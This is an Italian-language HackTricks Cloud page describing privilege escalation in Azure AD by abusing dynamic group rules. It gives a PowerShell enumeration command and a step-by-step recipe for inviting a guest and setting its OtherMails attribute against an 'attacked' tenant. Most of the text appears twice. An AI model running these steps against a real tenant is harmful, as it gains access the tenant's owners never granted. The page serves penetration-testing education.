Az - Dynamic Groups Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Informazioni di base

I gruppi dinamici sono gruppi che hanno un insieme di regole configurate e tutti gli utenti o dispositivi che corrispondono alle regole vengono aggiunti al gruppo. Ogni volta che un attributo di un utente o dispositivo viene cambiato, le regole dinamiche vengono ricontrollate. E quando una nuova regola viene creata, tutti i dispositivi e gli utenti vengono controllati.

I gruppi dinamici possono avere ruoli Azure RBAC assegnati a loro, ma non è possibile aggiungere ruoli AzureAD ai gruppi dinamici.

Questa funzionalità richiede una licenza Azure AD premium P1.

Privesc

Nota che per impostazione predefinita qualsiasi utente può invitare ospiti in Azure AD, quindi, se una regola di un gruppo dinamico concede permessi agli utenti in base agli attributi che possono essere impostati in un nuovo ospite, è possibile creare un ospite con questi attributi e escalare i privilegi. È anche possibile per un ospite gestire il proprio profilo e cambiare questi attributi.

Ottieni gruppi che consentono l'appartenenza dinamica: Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}

Esempio

Esempio di regola: (user.otherMails -any (_ -contains "tester")) -and (user.userType -eq "guest")
Descrizione della regola: Qualsiasi utente ospite con un'email secondaria contenente la stringa 'tester' verrà aggiunto al gruppo

Vai su Azure Active Directory -> Utenti e clicca su Vuoi tornare all'esperienza della lista utenti legacy? Clicca qui per lasciare l'anteprima
Clicca su Nuovo utente ospite e invita un'email
Il profilo dell'utente verrà aggiunto ad Azure AD non appena l'invito viene inviato. Apri il profilo dell'utente e clicca su (gestisci) sotto Invito accettato.

Cambia Reinvia invito? in Sì e otterrai un URL di invito:

Copia l'URL e apri esso, accedi come utente invitato e accetta l'invito
Accedi nella cli come utente e imposta l'email secondaria

```powershell
# Login
$password = ConvertTo-SecureString 'password' - AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('externaltester@somedomain.onmicrosoft.com', $Password)
Connect-AzureAD -Credential $creds -TenantId <tenant_id_of_attacked_domain>

# Cambiare l'impostazione OtherMails
Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT_NAME>.onmicrosoft.com -Verbose
```

Riferimenti

https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.

PreviousAz - Conditional Access Policies / MFA Bypass NextDigital Ocean Pentesting

Last updated 3 days ago

Informazioni di base

I gruppi dinamici possono avere ruoli Azure RBAC assegnati a loro, ma non è possibile aggiungere ruoli AzureAD ai gruppi dinamici.

Questa funzionalità richiede una licenza Azure AD premium P1.

Privesc

Ottieni gruppi che consentono l'appartenenza dinamica: Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}

Esempio

Esempio di regola: (user.otherMails -any (_ -contains "tester")) -and (user.userType -eq "guest")

Descrizione della regola: Qualsiasi utente ospite con un'email secondaria contenente la stringa 'tester' verrà aggiunto al gruppo

Vai su Azure Active Directory -> Utenti e clicca su Vuoi tornare all'esperienza della lista utenti legacy? Clicca qui per lasciare l'anteprima

Clicca su Nuovo utente ospite e invita un'email

Il profilo dell'utente verrà aggiunto ad Azure AD non appena l'invito viene inviato. Apri il profilo dell'utente e clicca su (gestisci) sotto Invito accettato.

Cambia Reinvia invito? in Sì e otterrai un URL di invito:

Copia l'URL e apri esso, accedi come utente invitato e accetta l'invito

Accedi nella cli come utente e imposta l'email secondaria

```powershell
# Login
$password = ConvertTo-SecureString 'password' - AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('externaltester@somedomain.onmicrosoft.com', $Password)
Connect-AzureAD -Credential $creds -TenantId <tenant_id_of_attacked_domain>

# Cambiare l'impostazione OtherMails
Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT_NAME>.onmicrosoft.com -Verbose
```